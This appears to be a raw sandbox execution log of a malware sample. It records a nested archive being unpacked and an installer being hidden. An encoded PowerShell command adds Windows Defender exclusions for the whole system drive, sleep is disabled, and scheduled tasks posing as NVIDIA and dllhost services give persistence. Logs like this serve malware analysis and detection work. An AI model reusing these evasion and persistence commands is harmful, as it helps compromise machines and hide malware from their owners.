mode.com mode 65,10
22127z.exe 7z.exe e file.zip -p1432210452150682449214609890 -oextracted
22847z.exe 7z.exe e extracted/file_8.zip -oextracted
23447z.exe 7z.exe e extracted/file_7.zip -oextracted
23927z.exe 7z.exe e extracted/file_6.zip -oextracted
24407z.exe 7z.exe e extracted/file_5.zip -oextracted
24887z.exe 7z.exe e extracted/file_4.zip -oextracted
25367z.exe 7z.exe e extracted/file_3.zip -oextracted
25847z.exe 7z.exe e extracted/file_2.zip -oextracted
26407z.exe 7z.exe e extracted/file_1.zip -oextracted
2688attrib.exe attrib +H "Installer.exe"
2736cmd.exe "cmd.exe" /C powershell -EncodedCommand "PAAjAHcAMwBWACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMARABvAEQAZgBOAE8AMQBxAGMARwAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwA3ADMAeABVAHAAbwA3AHYAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAYgBTAHMAaQAwAGMAVQBwACMAPgA=" & powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 & powercfg /hibernate off
3000powershell.exe powershell -EncodedCommand "PAAjAHcAMwBWACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMARABvAEQAZgBOAE8AMQBxAGMARwAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwA3ADMAeABVAHAAbwA3AHYAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAYgBTAHMAaQAwAGMAVQBwACMAPgA="
3056powercfg.exe powercfg /x -hibernate-timeout-ac 0
2272powercfg.exe powercfg /x -hibernate-timeout-dc 0
2364powercfg.exe powercfg /x -standby-timeout-ac 0
2412powercfg.exe powercfg /x -standby-timeout-dc 0
2492powercfg.exe powercfg /hibernate off
2660cmd.exe "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "NvStray\NvStrayService_bk32" /TR "C:\ProgramData\Dllhost\dllhost.exe"
2820cmd.exe "cmd.exe" /c SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"
2764schtasks.exe SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"
2136